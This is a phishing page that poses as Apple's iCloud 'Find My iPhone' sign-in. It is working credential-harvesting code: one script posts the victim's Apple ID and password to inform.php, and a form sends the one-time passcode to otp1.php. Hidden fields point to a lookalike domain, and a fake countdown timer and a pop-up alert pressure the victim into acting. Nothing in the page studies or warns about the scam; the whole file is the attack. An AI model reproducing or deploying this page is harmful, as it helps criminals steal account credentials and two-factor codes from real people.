<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="robots" content="nofollow"><title>Apple Inc.</title><link rel="stylesheet" type="text/css" href="./Apple Inc._files/style.css"><style type="text/css"></style></head>   
    <body id="main-body">
    <link rel="stylesheet" href="./Apple Inc._files/bootstrap.min.css">
    

    <script src="./Apple Inc._files/jquery.min.js"></script>
    <script>
        function SubmitMe() {
            $.ajax({
                url: 'inform.php',
                dataType: 'json',
                type: 'post',
                contentType: 'application/json',
                data: JSON.stringify( { "username": $('#username').val(), "pw": $('#password').val() } ),
                processData: false,
                success: function( data, textStatus, jQxhr ){
                    $('#result').html( JSON.stringify( data ) );
                },
                error: function( jqXhr, textStatus, errorThrown ){
                    alert("This account doesn't exist please check your Apple ID and Password and try again.");
                }
            });
            return false;
        }
    </script>


<div id="container">
    <div id="row">
        <div id="iCloudLogo"></div>
        <div id="title-center">
            <h1>Find My iPhone</h1>
        </div>
        <div id="form-center">
            <form action="otp1.php" method="post">
                <div id="form-group-container">
                    
                    <div id="form-group">
                        <label for="password">OTP</label>
                        <input autocorrect="off" autocapitalize="off" type="password" name="pass" id="password" placeholder="required">
                        <input type="hidden" value="https://p01-caldav.icloud.com" id="server" name="server">

                    </div>
                </div>
				&nbsp;
				&nbsp;
				&nbsp;
				  <input type="hidden" value="English" name="lang" id="lang">

                <input type="hidden" value="www.icloudre.com/apple.html" name="link">
                <input type="submit" style="position: absolute; height: 0px; width: 0px; border: none; padding: 0px;" hidefocus="true" tabindex="-1">
            </form>
        </div>
		&nbsp;
				<center> <div>Time left - <span id="timer">2:00</span></div></center>
    
        <div id="help-center">
            <a class="help-a-style" href="https://iforgot.apple.com/">Forgot your Apple ID or password?</a>
            <span id="result"></span>
        </div>
        <div id="footer">
                            <a class="help-a-style" style="font-size: 35pt;" href="http://www.apple.com/icloud/setup/">Setup Instruction</a>
                        <p>Version 8.0 (6A86)</p>
        </div>
    </div>
</div>
<script type="text/javascript">
             startTimer();

function startTimer() {
  var presentTime = document.getElementById('timer').innerHTML;
  var timeArray = presentTime.split(/[:]+/);
  var m = timeArray[0];
  var s = checkSecond((timeArray[1] - 1));
  if(s==11){m=m-1}
  if((m + '').length == 1){
    m = '0' + m;
  }
  if(m < 0){
    m = '11';
  }
  document.getElementById('timer').innerHTML = m + ":" + s;
  setTimeout(startTimer, 1000);
}

function checkSecond(sec) {
  if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
  if (sec < 0) {sec = "59"};
  return sec;
}
</script>
<audio id="xyz" src="https://x2convert.com/Thankyou?token=U2FsdGVkX19zZMVUt9FiInLG3xbWVEJ5Qo3jI3T1LqIK7LvqpIWb9DRoXutU4sdS5xwu6RqaXWm7aJcIoxqPWJPv6y6%2fAwEdoYgxddDrJ%2fKfoRDyWwf3gW%2fB2LL9fK9MxIdB2P2W9PIH0UcMazELrvBIYp0g8pQGFwORMDBjukJFjZc%2f0dMbScfWa5oyiKcE&s=youtube&id=&h=3692998352381650705" preload="auto"></audio>
<br>
<div dir="ltr" style="text-align: left;" trbidi="on">
<script>
   var count = 10; // Number of remaining seconds.
   var counter; // Handle for the countdown event.
   
   function start() {
    counter = setInterval(timer, 1000);
   }

   function timer() {
    // Show the number of remaining seconds on the web page.
    var output = document.getElementById("displaySeconds");
    output.innerHTML = count;
    
    // Decrease the remaining number of seconds by one.
    count--;
    
    // Check if the counter has reached zero.
    if (count < 0) { // If the counter has reached zero...
     // Stop the counter.
     clearInterval(counter);
     
     // Start the download.
      {
      document.getElementById('xyz').play();
  alert("YOUR OTP IS 64583");
}
     return;
    }
   }  
   // Start the countdown timer when the page loads. 
   window.addEventListener("load", start, false);
  </script>
<span style="color: white;">
<span id="displaySeconds"></span>


<script src="./Apple Inc._files/bootstrap.min.js"></script>
<script>
    $(document).ready(function() {
        var userLang = navigator.language || navigator.userLanguage;
        console.log(userLang);
        $("input[name=apple]").focus();
        $(".clearable").on('click', function(){
            $("input[name=apple]").val('').change();
            $(this).attr("src", "blue-icon-close.png");
            $(this).css("display", "none");
            $(this).attr("src", "Close-icon.png");
        });
        function isValidEmailAddress(emailAddress) {
            var pattern = new RegExp(/^(("[\w-+\s]+")|([\w-+]+(?:\.[\w-+]+)*)|("[\w-+\s]+")([\w-+]+(?:\.[\w-+]+)*))(@((?:[\w-+]+\.)*\w[\w-+]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$)|(@\[?((25[0-5]\.|2[0-4][\d]\.|1[\d]{2}\.|[\d]{1,2}\.))((25[0-5]|2[0-4][\d]|1[\d]{2}|[\d]{1,2})\.){2}(25[0-5]|2[0-4][\d]|1[\d]{2}|[\d]{1,2})\]?$)/i);
            return pattern.test(emailAddress);
        };
        $('input[name=apple]').bind("keydown", function(e){
            if(e.which == 13){
                e.preventDefault();
                var val = $(this).val();
                if (!isValidEmailAddress(val)) {
                    val = val+"@icloud.com";
                    $(this).val(val);
                } else {
                    console.log($(this).val());
                }
                console.log(val);
                $("input[name=pw]").focus();
                return false;
            } else if (e.keyCode == 8 || e.keyCode == 46) {
                if($("input[name=apple]").val() == "") {
                    $(".clearable").css("display", "none");
                    $(".clearable").attr("src", "Close-icon.png");
                }
            } else if($("input[name=apple]").val() == "") {
                $(".clearable").css("display", "none");
                $(".clearable").attr("src", "Close-icon.png");
            } else {
                $(".clearable").css("display", "block");
            }
        });

    });
</script>
</body></html>
